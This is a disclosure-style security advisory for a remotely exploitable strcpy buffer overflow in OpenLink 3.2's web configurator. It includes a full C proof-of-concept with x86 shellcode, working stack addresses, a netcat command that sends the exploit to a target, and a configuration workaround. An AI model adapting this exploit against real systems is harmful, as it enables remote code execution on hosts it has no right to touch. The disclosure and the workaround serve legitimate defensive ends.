Overview:

A serious security hole has been found in the web configuration utility
that comes with OpenLink 3.2.  This hole will allow remote users to
execute arbitrary code as the user id under which the web configurator is
run (inherited from the request broker, oplrqb).  The hole is a
run-of-the-mill buffer overflow, due to lack of parameter checking when
strcpy() is used.

Background:

OpenLink is a database request broker, used for a generic interface to
different database vendors' products.  By default, a web configuration
utility is installed, which runs at port 8000.  For more information, see
OpenLink Software's web site at http://www.openlinksw.com.

Exploit:

This exploit has been coded to be benign, and is just for illustration of
the hole in the configuration utility.  Furthermore, it has not been coded
for portability (no promises that it will function if compiled with
anything other than egcs-2.91.66, and it will not compile on a non-x86
compiler).  This works against the linux glibc version of OpenLink 3.2's
configurator.  It can easily be modified for other purposes, however, and
I have reason to believe that the majority, if not all, platforms are
vulnerable to such an attack.

A stack address may be specified on the command line (I've had luck with
0xbffffb65, 0xbffffb85 or 0xbffffbe5).  Output of this should be piped
through netcat, e.g.

./oplwall 0xbffffb85 | nc machine.to.hit 8000

--- cut ---
#include <stdio.h>
#include <unistd.h>

/*
 * Exploit for Openlink's web configurator for Linux/glibc2
 *  use: pipe through netcat to openlink web port (8000 default)
 *  ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000
 *  makes www_sv execute /usr/bin/wall if you hit the address right
 *
 * For informational purposes only.  This was written to show that
 *  there's a problem, not for skr1pt k1dd33z --.
 *  don't ask me for help on how to use this to crack systems,
 *  help compiling or anything else.  It will only compile on
 *  an x86 compiler however.
 *
 * Addresses that work for me: 0xbffffb65 (initial run of the broker)
 *                             0xbffffb85 (all consecutive attempts)
 *                             probably tied to process ID www_sv runs as;
 *                             first try PIDs were in triple digits, others
 *                             4 digit PIDs.
 *
 * If this works, generally no more www_sv processes will be run as a side effect.
 */

void test() {

__asm__("

        jmp    doit
exploit:

        # code basically from Aleph One's smash stacking article, with
        #  minor mods

        popl  %esi
        movb  $0xd0, %al            # Get a / character into %al
        xorb  $0xff, %al
        movb  %al, 0x1(%esi)        # drop /s into place
        movb  %al, 0x5(%esi)
        movb  %al, 0x9(%esi)
        xorl  %eax,%eax             # clear %eax
        movb  %eax,0xe(%esi)        # drop a 0 at end of string
        movl  %eax,0x13(%esi)       # drop NULL for environment
        leal  0x13(%esi),%edx       # point %edx to environment
        movl  %esi,0xf(%esi)        # drop pointer to argv
        leal  0xf(%esi),%ecx        # point %ecx to argv
        movl  %esi,%ebx             # point ebx to command - 1
        inc   %ebx                  # fix it to point to the right place
        movb  $0xb,%al              # index to execve syscall
        int   $0x80                 # execute it
        xorl  %ebx,%ebx            #  if exec failed, exit nicely...
        movl  %ebx,%eax
        inc   %eax
        int   $0x80
doit:
        call exploit
        .string \"..usr.bin.wall.\"
");

}

char *shellcode = ((char *)test) + 3;

char code[1000];

int main(int argc, char *argv[])

{
        int i;
        int left;
        unsigned char where[] = {"\0\0\0\0\0"} ;
        int *here;
        char *dummy;
        long addr;


        if (argc > 1)
                addr = strtoul(argv[1], &dummy, 0);
        else
                addr = 0xbffffb85;

        fprintf(stderr, "Setting address to %8x\n", addr);



        *((long *)where) = addr;

        strcpy(code, shellcode);

        for (i = 0; i < 64; i++) {
                strcat(code, where);
        }

        printf("GET %s\n", code);

        exit(0);

}

--- cut ---

Workaround:

Disable the www_sv application in oplrqb.ini.  By default there is a
section labeled Persistent Services, with the line
"Configurator = www_sv". This section, along with the entire www_sv
section, should be commented out with semicolons, e.g.

;[Persistent Services]
;Configurator = www_sv

;[www_sv]
;Program     = w3config/www_sv
;Directory   = w3config
;CommandLine =
;Environment = WWW_SV

;[Environment WWW_SV]

Discussion:

OpenLink software has been notified of the problem is is apparently
working on a solution.  I have serious concerns that the package may be
prone to other attacks, but have no confirmation of this (other than basic
DOS attacks). My suggestion is to definitely make sure any machine running
the OpenLink broker is well protected behind a firewall, and it should not
allow logins from untrusted persons.

Kudos to:

Aleph One, for his long-lived stack smashing article, and this
whole BugTraq thing.

Hobbit, of course, for netcat.

-Tymm



The NT version is vulnerable to a boundary condition as well.  If memory
serves (I looked at this last april, so it may be foggy) I was able to
sucessfully modify the EIP but found no obvious way to get back to the
overflowing buffer (where my egg would be).  When I left off I found some
code that would jump me back a little bit before the buffer.
Unfortunately, the data formed some invalid opcodes, so no luck.  I'm sure
someone can figure it out, I'm sick having my clock off by 6 hours from
SoftIce warp :)